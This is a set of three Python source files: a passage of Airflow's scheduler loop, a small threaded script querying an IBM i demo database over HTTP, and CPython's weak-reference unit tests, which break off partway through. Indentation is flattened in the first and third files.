simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instances with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running, so we need to subtract 1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to scheduled state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in (LocalExecutor, SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=self.dag_ids,
zombies=zombies
)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
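# Illustrative sketch (not part of the scheduler module above): the
# throttling logic used by the loop above, reduced to plain Python.
# `do_work` and `send_heartbeat` are placeholder callables, not names
# taken from the scheduler code.
import time as _time
def _run_throttled_loop(do_work, send_heartbeat, heartrate=5.0, min_loop_seconds=1.0, max_loops=3):
    last_heartbeat = _time.time()
    for _ in range(max_loops):
        loop_start = _time.time()
        do_work()
        # Heartbeat only when enough time has passed since the previous one.
        if _time.time() - last_heartbeat > heartrate:
            send_heartbeat()
            last_heartbeat = _time.time()
        # Sleep away the remainder of the interval to avoid a busy loop.
        loop_duration = _time.time() - loop_start
        if loop_duration < min_loop_seconds:
            _time.sleep(min_loop_seconds - loop_duration)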
|
isql_rest_async.py
|
try:
    import queue
except ImportError:
    import Queue as queue  # Python 2 fallback
import threading
from itoolkit.transport import HttpTransport
from itoolkit import *
class iDB2Async():
    """Run a single SQL statement over the XMLSERVICE HTTP transport."""
    def __init__(self, isql):
        self.itran = HttpTransport('http://yips.idevcloud.com/cgi-bin/xmlcgi.pgm', '*NONE', '*NONE')
        self.itool = iToolKit()
        self.itool.add(iSqlQuery('iqry', isql))
        self.itool.add(iSqlFetch('ifch'))
        self.itool.add(iSqlFree('ifre'))
    def go(self):
        self.itool.call(self.itran)
        return self.itool.dict_out('ifch')
def get_url(q, icmd):
    # Worker: run the query and push its fetched rows onto the shared queue.
    q.put(iDB2Async(icmd).go())
thedb2s = ["select CUSNUM from QIWS/QCUSTCDT where LSTNAM='Jones'",
           "select CUSNUM from QIWS/QCUSTCDT where LSTNAM='Johnson'"]
q = queue.Queue()
# Fan out: one daemon thread per statement.
for u in thedb2s:
    t = threading.Thread(target=get_url, args=(q, u))
    t.daemon = True
    t.start()
# Fan in: q.get() blocks until a worker has produced a result, so this loop
# collects exactly one result per statement (q.join() is not needed here).
for u in thedb2s:
    s = q.get()
    print(s)
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
from test.support import gc_collect
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
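# Illustrative sketch (not from the original file): how collect_in_thread()
# is used further below -- hammer a weak container while the background
# thread forces frequent collections, to expose races between GC-triggered
# removals and ordinary dictionary operations.
def _example_collect_in_thread_usage():
    d = weakref.WeakValueDictionary()
    with collect_in_thread():
        for _ in range(1000):
            d[10] = RefCycle()   # the previous value becomes cyclic garbage
    return len(d)                # 0 or 1, depending on when GC last ran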
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
gc_collect() # For PyPy or other GCs.
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
gc_collect() # For PyPy or other GCs.
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
ref3 = weakref.proxy(C())
gc_collect() # For PyPy or other GCs.
self.assertRaises(ReferenceError, bool, ref3)
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
gc_collect() # For PyPy or other GCs.
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
        self.assertIsNone(ref(),
                          "ref should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_proxy_next(self):
arr = [4, 5, 6]
def iterator_func():
yield from arr
it = iterator_func()
class IteratesWeakly:
def __iter__(self):
return weakref.proxy(it)
weak_it = IteratesWeakly()
# Calls proxy.__next__
self.assertEqual(list(weak_it), [4, 5, 6])
def test_proxy_bad_next(self):
# bpo-44720: PyIter_Next() shouldn't be called if the reference
# isn't an iterator.
not_an_iterator = lambda: 0
class A:
def __iter__(self):
return weakref.proxy(not_an_iterator)
a = A()
with self.assertRaises(TypeError):
list(a)
def test_proxy_reversed(self):
class MyObj:
def __len__(self):
return 3
def __reversed__(self):
return iter('cba')
obj = MyObj()
self.assertEqual("".join(reversed(weakref.proxy(obj))), "cba")
def test_proxy_hash(self):
class MyObj:
def __hash__(self):
return 42
obj = MyObj()
with self.assertRaises(TypeError):
hash(weakref.proxy(obj))
class MyObj:
__hash__ = None
obj = MyObj()
with self.assertRaises(TypeError):
hash(weakref.proxy(obj))
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
@support.impl_detail(pypy=False)
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
@support.impl_detail(pypy=False)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
